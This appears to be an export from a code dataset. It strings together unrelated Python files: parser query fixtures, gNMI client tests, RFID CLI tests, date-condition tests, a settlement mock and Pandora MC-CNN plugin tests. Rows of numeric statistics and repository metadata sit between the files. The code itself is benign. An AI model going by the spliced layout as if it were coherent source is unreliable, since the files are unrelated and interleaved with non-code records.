statement: {
target phrase: the museum,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: hosts,
modal_vb: None
},
acomp_list: []
},
related phrase: more than 10 pictures
}
statement: {
target phrase: the museum,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: exposed,
modal_vb: None
},
acomp_list: []
},
related phrase: one sword
}
"""
}
]
WHO_PAIRS = [
{
"query": "Who is very beautiful?",
"result": """
statement: {
target phrase: who,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: [beautiful]
},
related phrase: beautiful
}
"""
},
{
"query": "Who is very beautiful and very smart?",
"result": """
statement: {
target phrase: who,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: [beautiful, smart]
},
related phrase: beautiful
}
statement: {
target phrase: who,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: [beautiful, smart]
},
related phrase: ##and## smart
}
"""
},
{
"query": "Who is the most beautiful woman and the most generous person?",
"result": """
statement: {
target phrase: who,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the most beautiful woman
}
statement: {
target phrase: who,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: ##and## the most generous person
}
"""
},
{
"query": "Who is the director who own 2 cars and sold a house or a panel?",
"result": """
statement: {
target phrase: who,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the director
}
statement: {
target phrase: the director,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: own,
modal_vb: None
},
acomp_list: []
},
related phrase: 2 cars
}
statement: {
target phrase: the director,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: sold,
modal_vb: None
},
acomp_list: []
},
related phrase: a house
}
statement: {
target phrase: the director,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: sold,
modal_vb: None
},
acomp_list: []
},
related phrase: ##or## a panel
}
"""
}
]
WHOSE_PAIRS = [
{
"query": "Whose picture is it?",
"result": """
statement: {
target phrase: whose picture,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: it
}
"""
}
]
WHEN_PAIRS = [
# {
# # FIXME:
# "query": "When does the museum open?",
# "result": """
#
# """
# }
]
WHERE_PAIRS = [
{
"query": "Where is the museum?",
"result": """
statement: {
target phrase: where,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the museum
}
"""
},
{
"query": "Where is the museum located?",
"result": """
statement: {
target phrase: where,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: located,
modal_vb: None
},
acomp_list: []
},
related phrase: the museum
}
"""
},
{
"query": "Where does the engineer go?",
"result": """
statement: {
target phrase: where,
action: {
neg: None,
verb: {
aux_vbs: [does],
main_vb: go,
modal_vb: None
},
acomp_list: []
},
related phrase: the engineer
}
"""
},
{
"query": "Where are the coins and swords located?",
"result": """
statement: {
target phrase: where,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: located,
modal_vb: None
},
acomp_list: []
},
related phrase: the coins
}
statement: {
target phrase: where,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: located,
modal_vb: None
},
acomp_list: []
},
related phrase: ##and## swords
}
"""
},
{
"query": "Where was the last place the picture was exposed?",
"result": """
statement: {
target phrase: where,
action: {
neg: None,
verb: {
aux_vbs: [was],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the last place
}
statement: {
target phrase: the last place,
action: {
neg: None,
verb: {
aux_vbs: [was],
main_vb: exposed,
modal_vb: None
},
acomp_list: []
},
related phrase: the picture
}
"""
},
{
# TODO: improve the statement structure
"query": "Where does the holder of the position of Lech Kaczynski live?",
"result": """
statement: {
target phrase: where,
action: {
neg: None,
verb: {
aux_vbs: [does],
main_vb: live,
modal_vb: None
},
acomp_list: []
},
related phrase: the holder
}
statement: {
target phrase: the holder,
action: {
neg: None,
verb: {
aux_vbs: [does],
main_vb: live,
modal_vb: None
},
acomp_list: []
},
related phrase: of the position
}
statement: {
target phrase: of the position,
action: {
neg: None,
verb: {
aux_vbs: [does],
main_vb: live,
modal_vb: None
},
acomp_list: []
},
related phrase: of Lech Kaczynski
}
"""
}
]
QUANTITY_QUESTIONS_PAIRS = [
{
"query": "How long does the museum remain closed?",
"result": """
statement: {
target phrase: how long does the museum,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: remain,
modal_vb: None
},
acomp_list: [closed]
},
related phrase: closed
}
"""
},
{
"query": "How many days do I have to wait for him?",
"result": """
statement: {
target phrase: how many days do I,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: wait,
modal_vb: None
},
acomp_list: []
},
related phrase: for him
}
"""
}
]
DIRECT_QUESTIONS_PAIRS = [
# {
# # FIXME:
# "query": "Did James work with Andrew?",
# "result": ""
# }
]
PAIRS_00 = WHAT_PAIRS + \
WHAT_IS_PAIRS + \
WHICH_PAIRS + \
WHICH_IS_PAIRS + \
WHO_PAIRS + \
WHOSE_PAIRS + \
WHEN_PAIRS + \
WHERE_PAIRS + \
QUANTITY_QUESTIONS_PAIRS + \
DIRECT_QUESTIONS_PAIRS
| 16.033333 | 115 | 0.572312 | 2,279 | 18,759 | 4.573497 | 0.054849 | 0.065624 | 0.143049 | 0.10899 | 0.873261 | 0.842176 | 0.822892 | 0.806198 | 0.798427 | 0.789696 | 0 | 0.001187 | 0.281518 | 18,759 | 1,169 | 116 | 16.047049 | 0.772147 | 0.015246 | 0 | 0.646544 | 0 | 0 | 0.870929 | 0 | 0 | 0 | 0 | 0.000855 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fec1e6223467375d7df7c3d19f933f030f748d45 | 2,489 | py | Python | tests/test_address_types.py | jamie01/pygnmi | b2c2b2b87fe384a91fa79e0682a7ea485708d464 | [
"BSD-3-Clause"
] | 58 | 2020-09-28T20:23:25.000Z | 2022-03-23T06:59:21.000Z | tests/test_address_types.py | jamie01/pygnmi | b2c2b2b87fe384a91fa79e0682a7ea485708d464 | [
"BSD-3-Clause"
] | 48 | 2021-01-05T08:34:27.000Z | 2022-03-29T01:17:36.000Z | tests/test_address_types.py | jamie01/pygnmi | b2c2b2b87fe384a91fa79e0682a7ea485708d464 | [
"BSD-3-Clause"
] | 21 | 2020-10-28T14:38:19.000Z | 2022-01-30T19:49:29.000Z | #!/usr/bin/env python
# Modules
from pygnmi.client import gNMIclient
from dotenv import load_dotenv
import os
# User-defined functions (Tests)
def test_fqdn_address():
load_dotenv()
username_str = os.getenv("PYGNMI_USER")
password_str = os.getenv("PYGNMI_PASS")
hostname_str = os.getenv("PYGNMI_HOST")
port_str = os.getenv("PYGNMI_PORT")
path_cert_str = os.getenv("PYGNMI_CERT")
gc = gNMIclient(target=(hostname_str, port_str), username=username_str, password=password_str, path_cert=path_cert_str)
gc.connect()
result = gc.capabilities()
gc.close()
assert "supported_models" in result
assert "supported_encodings" in result
assert "gnmi_version" in result
def test_ipv4_address_override():
load_dotenv()
username_str = os.getenv("PYGNMI_USER")
password_str = os.getenv("PYGNMI_PASS")
hostname_str = os.getenv("PYGNMI_HOST_2")
port_str = os.getenv("PYGNMI_PORT")
path_cert_str = os.getenv("PYGNMI_CERT")
gc = gNMIclient(target=(hostname_str, port_str), username=username_str, password=password_str, path_cert=path_cert_str, override="EOS425")
gc.connect()
result = gc.capabilities()
gc.close()
assert "supported_models" in result
assert "supported_encodings" in result
assert "gnmi_version" in result
def test_ipv4_address_certificate_download():
load_dotenv()
username_str = os.getenv("PYGNMI_USER")
password_str = os.getenv("PYGNMI_PASS")
hostname_str = os.getenv("PYGNMI_HOST_2")
port_str = os.getenv("PYGNMI_PORT")
path_cert_str = os.getenv("PYGNMI_CERT")
gc = gNMIclient(target=(hostname_str, port_str), username=username_str, password=password_str)
gc.connect()
result = gc.capabilities()
gc.close()
assert "supported_models" in result
assert "supported_encodings" in result
assert "gnmi_version" in result
def test_ipv6_address_override():
load_dotenv()
username_str = os.getenv("PYGNMI_USER")
password_str = os.getenv("PYGNMI_PASS")
hostname_str = os.getenv("PYGNMI_HOST_3")
port_str = os.getenv("PYGNMI_PORT")
path_cert_str = os.getenv("PYGNMI_CERT")
gc = gNMIclient(target=(hostname_str, port_str), username=username_str, password=password_str, path_cert=path_cert_str, override="EOS425")
gc.connect()
result = gc.capabilities()
gc.close()
assert "supported_models" in result
assert "supported_encodings" in result
assert "gnmi_version" in result | 28.609195 | 142 | 0.721977 | 335 | 2,489 | 5.062687 | 0.155224 | 0.058962 | 0.129717 | 0.200472 | 0.908608 | 0.908608 | 0.908608 | 0.908608 | 0.908608 | 0.908608 | 0 | 0.005797 | 0.168341 | 2,489 | 87 | 143 | 28.609195 | 0.813527 | 0.023704 | 0 | 0.813559 | 0 | 0 | 0.175453 | 0 | 0 | 0 | 0 | 0 | 0.20339 | 1 | 0.067797 | false | 0.135593 | 0.050847 | 0 | 0.118644 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
fecb7271db9368fd5133c94090daafb46098a0d5 | 111 | py | Python | tests/python/tests.py | PedroCisnerosSantana/sdk-generator | c0a1b013d77f3a022de69c21961ce209a46d4079 | [
"MIT"
] | null | null | null | tests/python/tests.py | PedroCisnerosSantana/sdk-generator | c0a1b013d77f3a022de69c21961ce209a46d4079 | [
"MIT"
] | null | null | null | tests/python/tests.py | PedroCisnerosSantana/sdk-generator | c0a1b013d77f3a022de69c21961ce209a46d4079 | [
"MIT"
] | null | null | null |
from codeop import CommandCompiler
print("This line will be printed.")
print("This line will be printed.")
| 13.875 | 35 | 0.747748 | 16 | 111 | 5.1875 | 0.625 | 0.216867 | 0.313253 | 0.409639 | 0.626506 | 0.626506 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162162 | 111 | 7 | 36 | 15.857143 | 0.892473 | 0 | 0 | 0.666667 | 0 | 0 | 0.472727 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 8 |
fee19d91442865d29782e4c7cd87053babc7fc3a | 1,036 | py | Python | tests/cli/test_dbms.py | bcurnow/rfid-security-svc | d3806cb74d3d0cc2623ea425230dc8781ba4d8b4 | [
"Apache-2.0"
] | null | null | null | tests/cli/test_dbms.py | bcurnow/rfid-security-svc | d3806cb74d3d0cc2623ea425230dc8781ba4d8b4 | [
"Apache-2.0"
] | null | null | null | tests/cli/test_dbms.py | bcurnow/rfid-security-svc | d3806cb74d3d0cc2623ea425230dc8781ba4d8b4 | [
"Apache-2.0"
] | null | null | null | from unittest.mock import patch
@patch('rfidsecuritysvc.cli.dbms.dbms')
def test_init_db(dbms, runner, assert_output):
dbms.init_db.return_value = None
result = runner.invoke(args=['db', 'init'], input='y')
assert_output(result, 'Are you sure, this will delete all current data?')
assert_output(result, 'Initialized the database.')
dbms.init_db.assert_called_once()
@patch('rfidsecuritysvc.cli.dbms.dbms')
def test_init_db_with_confirm_option(dbms, runner, assert_output):
dbms.init_db.return_value = None
result = runner.invoke(args=['db', 'init', '--yes'])
assert 'Are you sure, this will delete all current data?' not in result.output
assert_output(result, 'Initialized the database.')
dbms.init_db.assert_called_once()
@patch('rfidsecuritysvc.cli.dbms.dbms')
def test_init_db_no(dbms, runner, assert_output):
result = runner.invoke(args=['db', 'init'], input='n')
assert_output(result, 'Are you sure, this will delete all current data?', 1)
dbms.init_db.assert_not_called()
| 38.37037 | 82 | 0.727799 | 152 | 1,036 | 4.763158 | 0.302632 | 0.066298 | 0.069061 | 0.111878 | 0.831492 | 0.831492 | 0.831492 | 0.779006 | 0.779006 | 0.665746 | 0 | 0.00112 | 0.138031 | 1,036 | 26 | 83 | 39.846154 | 0.80963 | 0 | 0 | 0.45 | 0 | 0 | 0.295367 | 0.083977 | 0 | 0 | 0 | 0 | 0.55 | 1 | 0.15 | false | 0 | 0.05 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fee8954f5491406754a3a4033b748a81bce917ee | 4,376 | py | Python | tests/test_daterange.py | Kwpolska/daterange | 0f73be4f1a3f78bde74d31ab8c961d3dbe0b3dcb | [
"BSD-3-Clause"
] | 3 | 2016-07-13T20:14:04.000Z | 2021-01-14T17:17:08.000Z | tests/test_daterange.py | Kwpolska/daterange | 0f73be4f1a3f78bde74d31ab8c961d3dbe0b3dcb | [
"BSD-3-Clause"
] | null | null | null | tests/test_daterange.py | Kwpolska/daterange | 0f73be4f1a3f78bde74d31ab8c961d3dbe0b3dcb | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# datecond test suite
# Copyright © 2016-2021, Chris Warrick.
# See /LICENSE for licensing information.
from datecond import date_in_range
from datetime import date, datetime, timedelta
from freezegun import freeze_time
def test_single_cond_eq():
pattern = "year == 2016"
assert date_in_range(pattern, datetime(2016, 1, 1))
assert date_in_range(pattern, datetime(2016, 12, 31))
assert date_in_range(pattern, datetime(2016, 7, 13))
assert not date_in_range(pattern, datetime(2015, 1, 1))
assert not date_in_range(pattern, datetime(2015, 5, 5))
def test_single_cond_neq():
pattern = "day != 1"
assert date_in_range(pattern, datetime(2016, 1, 2))
assert date_in_range(pattern, datetime(2015, 1, 2))
assert date_in_range(pattern, datetime(2016, 12, 31))
assert not date_in_range(pattern, datetime(2015, 1, 1))
assert not date_in_range(pattern, datetime(2015, 12, 1))
def test_single_cond_gt():
pattern = "month > 6"
assert not date_in_range(pattern, datetime(2000, 6, 1))
assert date_in_range(pattern, datetime(2000, 7, 1))
assert date_in_range(pattern, datetime(2016, 8, 31))
assert not date_in_range(pattern, datetime(2006, 1, 6))
def test_multiple_cond():
pattern = "year == 2016, month > 6, day != 1"
assert date_in_range(pattern, datetime(2016, 7, 2))
assert date_in_range(pattern, datetime(2016, 12, 31))
assert not date_in_range(pattern, datetime(2015, 7, 2))
assert not date_in_range(pattern, datetime(2016, 6, 2))
assert not date_in_range(pattern, datetime(2016, 7, 1))
assert not date_in_range(pattern, datetime(2015, 6, 1))
def test_exact_date():
pattern = "<= 2016-07-13"
assert date_in_range(pattern, datetime(2016, 7, 13))
assert date_in_range(pattern, datetime(2016, 7, 12))
assert not date_in_range(pattern, datetime(2016, 7, 14))
assert not date_in_range(pattern, datetime(2016, 8, 13))
assert date_in_range(pattern, datetime(2010, 1, 1))
assert not date_in_range(pattern, datetime(2017, 1, 1))
def test_weekday_isoweekday():
pattern = "weekday == 2"
assert date_in_range(pattern, datetime(2016, 7, 13))
assert not date_in_range(pattern, datetime(2016, 7, 14))
pattern = "weekday != 0"
assert date_in_range(pattern, datetime(2016, 7, 13))
assert not date_in_range(pattern, datetime(2016, 7, 11))
pattern = "isoweekday == 3"
assert date_in_range(pattern, datetime(2016, 7, 13))
assert not date_in_range(pattern, datetime(2016, 7, 14))
pattern = "isoweekday != 1"
assert date_in_range(pattern, datetime(2016, 7, 13))
assert not date_in_range(pattern, datetime(2016, 7, 11))
def test_now_lt():
pattern = "< now"
assert date_in_range(pattern, datetime(2016, 7, 13), now=datetime(2016, 7, 14))
assert not date_in_range(pattern, datetime(2016, 7, 14), now=datetime(2016, 7, 14))
def test_now_today():
pattern = "== now"
assert date_in_range(pattern, datetime(2016, 7, 13), now=datetime(2016, 7, 13))
assert not date_in_range(pattern, datetime(2016, 7, 13, 1), now=datetime(2016, 7, 13))
assert not date_in_range(pattern, datetime(2016, 7, 14), now=datetime(2016, 7, 13))
pattern = "== today"
assert date_in_range(pattern, datetime(2016, 7, 13), now=datetime(2016, 7, 13))
assert date_in_range(pattern, datetime(2016, 7, 13, 1), now=datetime(2016, 7, 13))
assert not date_in_range(pattern, datetime(2016, 7, 14), now=datetime(2016, 7, 13))
def test_today_date_datetime():
pattern = "== today"
assert date_in_range(pattern, date(2016, 7, 13), now=date(2016, 7, 13))
assert not date_in_range(pattern, date(2016, 7, 14), now=date(2016, 7, 13))
assert date_in_range(pattern, date(2016, 7, 13), now=datetime(2016, 7, 13))
assert not date_in_range(pattern, date(2016, 7, 14), now=datetime(2016, 7, 13))
assert date_in_range(pattern, datetime(2016, 7, 13), now=date(2016, 7, 13))
assert not date_in_range(pattern, datetime(2016, 7, 14), now=date(2016, 7, 13))
@freeze_time("2016-07-13")
def test_today_no_now():
pattern = "== today"
assert date_in_range(pattern, date(2016, 7, 13))
assert not date_in_range(pattern, date(2016, 7, 14))
assert date_in_range(pattern, datetime(2016, 7, 13))
assert not date_in_range(pattern, datetime(2016, 7, 14))
| 41.283019 | 90 | 0.696298 | 696 | 4,376 | 4.188218 | 0.099138 | 0.109091 | 0.2 | 0.321098 | 0.809605 | 0.808919 | 0.806175 | 0.765009 | 0.70669 | 0.624357 | 0 | 0.135388 | 0.169561 | 4,376 | 105 | 91 | 41.67619 | 0.666483 | 0.03245 | 0 | 0.3125 | 0 | 0 | 0.041144 | 0 | 0 | 0 | 0 | 0 | 0.65 | 1 | 0.125 | false | 0 | 0.0375 | 0 | 0.1625 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
fef4214024988d464904c48df9a0900fa0de34b3 | 2,119 | py | Python | mocks/mss_agent.py | caser789/jsettle | 576b529b4546839ed3493da2219311023207e77b | [
"Apache-2.0"
] | null | null | null | mocks/mss_agent.py | caser789/jsettle | 576b529b4546839ed3493da2219311023207e77b | [
"Apache-2.0"
] | null | null | null | mocks/mss_agent.py | caser789/jsettle | 576b529b4546839ed3493da2219311023207e77b | [
"Apache-2.0"
] | null | null | null | import random
from model import const
class MSSAgent(object):
def __init__(self):
pass
def get_store_details(self, store_id):
return {
'settlement_cycle': random.choice([
const.SettlementCycle.REALTIME,
const.SettlementCycle.DAILY,
const.SettlementCycle.WEEKLY,
const.SettlementCycle.BIWEEKLY,
const.SettlementCycle.MONTHLY,
]),
'settlement_id': random.randint(1, 100),
'settle_to': random.choice([
const.SettlementTarget.MERCHANT_HOST,
const.SettlementTarget.MERCHANT,
const.SettlementTarget.STORE,
]),
}
def get_merchant_details(self, merchant_id):
return {
'settlement_cycle': random.choice([
const.SettlementCycle.REALTIME,
const.SettlementCycle.DAILY,
const.SettlementCycle.WEEKLY,
const.SettlementCycle.BIWEEKLY,
const.SettlementCycle.MONTHLY,
]),
'settlement_id': random.randint(1, 100),
'settle_to': random.choice([
const.SettlementTarget.MERCHANT_HOST,
const.SettlementTarget.MERCHANT,
const.SettlementTarget.STORE,
]),
}
def get_entity_info(self, service_id, entity_type, entity_id):
return {
'wallet_account_id': random.randint(1, 100),
'settlement_cycle': random.choice([
const.SettlementCycle.REALTIME,
const.SettlementCycle.DAILY,
const.SettlementCycle.WEEKLY,
const.SettlementCycle.BIWEEKLY,
const.SettlementCycle.MONTHLY,
]),
'settlement_target_type': random.choice([
const.SettlementTarget.MERCHANT_HOST,
const.SettlementTarget.MERCHANT,
const.SettlementTarget.STORE,
]),
'settlement_target_id': random.randint(1, 100),
}
mss_agent = MSSAgent()
| 32.6 | 66 | 0.56017 | 170 | 2,119 | 6.794118 | 0.252941 | 0.25974 | 0.088312 | 0.055411 | 0.807792 | 0.774892 | 0.774892 | 0.774892 | 0.774892 | 0.774892 | 0 | 0.011645 | 0.351581 | 2,119 | 64 | 67 | 33.109375 | 0.828967 | 0 | 0 | 0.727273 | 0 | 0 | 0.07126 | 0.010382 | 0 | 0 | 0 | 0 | 0 | 1 | 0.072727 | false | 0.018182 | 0.036364 | 0.054545 | 0.181818 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
3a369c0642a73d770643a022e08d17ad22e57f94 | 42,351 | py | Python | tests/test_plugin.py | CNES/Pandora_plugin_mccnn | f9414912e106a227370c305ef595aef67806206b | [
"Apache-2.0"
] | 4 | 2021-07-13T06:39:28.000Z | 2021-12-13T08:30:09.000Z | tests/test_plugin.py | qfardet/Pandora_plugin_mccnn | 2a53c94fa92d4f9804ae9bd6103900ed0810b3a1 | [
"Apache-2.0"
] | null | null | null | tests/test_plugin.py | qfardet/Pandora_plugin_mccnn | 2a53c94fa92d4f9804ae9bd6103900ed0810b3a1 | [
"Apache-2.0"
] | 4 | 2021-07-21T12:48:09.000Z | 2022-03-25T07:31:31.000Z | #!/usr/bin/env python
# coding: utf8
#
# Copyright (c) 2021 Centre National d'Etudes Spatiales (CNES).
#
# This file is part of PANDORA
#
# https://github.com/CNES/Pandora_plugin_mccnn
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
This module contains functions to test Pandora + plugin_mc-cnn
"""
from tempfile import TemporaryDirectory
import unittest
import rasterio
import numpy as np
import xarray as xr
import pandora
from pandora import matching_cost
from pandora_plugin_mc_cnn.plugin_mc_cnn import MCCNN # pylint: disable=unused-import
# pylint: disable=unsubscriptable-object
class TestPlugin(unittest.TestCase):
"""
TestPlugin class allows to test Pandora + plugin_mc-cnn
"""
def setUp(self):
"""
Method called to prepare the test fixture
"""
self.disp_ref = rasterio.open("tests/image/disp_left.tif").read(1)
self.disp_sec = rasterio.open("tests/image/disp_right.tif").read(1)
@staticmethod
def error(data, gt, threshold, unknown_disparity=0):
"""
Percentage of bad pixels whose error is > threshold
"""
nb_row, nb_col = data.shape
nb_error = 0
for row in range(nb_row):
for col in range(nb_col):
if gt[row, col] != unknown_disparity:
if abs((data[row, col] + gt[row, col])) > threshold:
nb_error += 1
return nb_error / float(nb_row * nb_col)
def test_mc_cnn(self):
""" "
Test Pandora + plugin_mc-cnn
"""
# Create temporary directory
with TemporaryDirectory() as tmp_dir:
pandora.main("tests/test_cfg_accurate.json", tmp_dir, verbose=False)
# Check the reference disparity map
if self.error(rasterio.open(tmp_dir + "/left_disparity.tif").read(1), self.disp_ref, 1) > 0.17:
raise AssertionError
# Check the secondary disparity map
if self.error(-1 * rasterio.open(tmp_dir + "/right_disparity.tif").read(1), self.disp_sec, 1) > 0.17:
raise AssertionError
@staticmethod
def test_invalidates_cost():
"""
Test the pipeline compute cost volume, and invalid cost with pandora function
"""
# ------------ Test the method with a reference mask ( secondary mask contains valid pixels ) ------------
# Mask convention
# cfg['image']['valid_pixels'] = 0
# cfg['image']['no_data'] = 1
# invalid_pixels all other values
data = np.zeros((13, 13), dtype=np.float64)
data += 0.1
mask = np.array(
(
[
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
]
),
dtype=np.int16,
)
left = xr.Dataset(
{"im": (["row", "col"], data), "msk": (["row", "col"], mask)},
coords={"row": np.arange(data.shape[0]), "col": np.arange(data.shape[1])},
)
left.attrs["valid_pixels"] = 0
left.attrs["no_data_mask"] = 1
left.attrs["crs"] = None
left.attrs["transform"] = None
data = np.zeros((13, 13), dtype=np.float64)
data += 0.1
# Secondary mask contains valid pixels
mask = np.zeros((13, 13), dtype=np.int16)
right = xr.Dataset(
{"im": (["row", "col"], data), "msk": (["row", "col"], mask)},
coords={"row": np.arange(data.shape[0]), "col": np.arange(data.shape[1])},
)
right.attrs["valid_pixels"] = 0
right.attrs["no_data_mask"] = 1
# Cost volume before invalidation, disparities = -1, 0, 1
cv_before_invali = np.array(
[
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, -1.0, -1.0],
[-1.0, -1.0, -1.0],
[-1.0, -1.0, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, -1.0, -1.0],
[-1.0, -1.0, -1.0],
[-1.0, -1.0, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, -1.0, -1.0],
[-1.0, -1.0, -1.0],
[-1.0, -1.0, np.nan],
